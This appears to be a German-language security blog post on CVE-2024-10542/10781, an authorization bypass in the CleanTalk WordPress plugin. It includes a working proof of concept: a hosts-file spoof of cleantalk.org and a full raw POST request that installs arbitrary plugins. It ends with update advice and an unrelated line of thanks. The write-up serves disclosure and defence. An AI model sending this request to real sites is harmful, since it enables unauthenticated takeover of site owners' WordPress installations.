
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 ist anfällig für eine nicht authentifizierte Installation beliebiger Plugins.
Die in diesem Dokument zu CVE-2024-10542 bereitgestellten Informationen dienen ausschließlich Lern- und Bildungszwecken. Wir ermutigen nicht zur Nutzung dieser Informationen für schädliche Zwecke und autorisieren diese auch nicht, einschließlich, aber nicht beschränkt auf Ausnutzung, Systemmanipulation oder andere illegale Aktivitäten.
In einer zunehmend komplexen digitalen Landschaft ist die Gewährleistung der Sicherheit von Websites für viele Website-Betreiber von größter Bedeutung. Kürzlich wurden zwei kritische Schwachstellen entdeckt, die eine erhebliche Bedrohung für WordPress-Sites darstellen. Diese Schwachstellen betreffen das bekannte CleanTalk-Plugin, das Spam-Schutz, Anti-Spam-Maßnahmen und eine Firewall bietet. Was macht diese Situation noch dringlicher? Lass uns tiefer eintauchen! Zwei Schwachstellen, die als CVE-2024-10542 und CVE-2024-10781 erfasst sind, könnten nicht authentifizierten Angreifern ermöglichen, schädliche Plugins auf anfälligen Sites zu installieren und zu aktivieren. Dies gefährdet nicht nur den Ruf der Site, sondern öffnet Angreifern auch die Tür zur Ausführung von Remote-Code. Mit einem CVSS-Score von 9,8 von 10 ist offensichtlich, dass diese Schwachstellen in die Kategorie „extrem gefährlich“ fallen. Laut Wordfence betreffen beide Schwachstellen ein Problem mit der Umgehung der Autorisierung, das es einem böswilligen Akteur ermöglichen könnte, beliebige Plugins zu installieren und zu aktivieren. Dies könnte dann den Weg für die Ausführung von Remote-Code ebnen, wenn das aktivierte Plugin selbst anfällig ist.
Zunächst werden böswillige Benutzer ihre Hosts-Datei in ihren Betriebssystemen anpassen:
127.0.0.1 cleantalk.org
Danach senden sie eine Anfrage wie diese:
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
Cybersicherheit ist eine Verantwortung, die jeder Website-Betreiber teilt. Indem wir Plugins auf dem neuesten Stand halten und wachsam gegenüber potenziellen Schwachstellen bleiben, können wir unsere Sites vor böswilligen Angriffen schützen. Stelle sicher, dass du CleanTalk auf die neueste Version aktualisiert hast, und führe Routineprüfungen anderer Plugins durch, um maximale Sicherheit zu gewährleisten. Denk daran: Kleine Schritte können große Katastrophen verhindern!
Allah, Muhammad SAW, mikemyers, Markdown Monster, meine Familie, dich?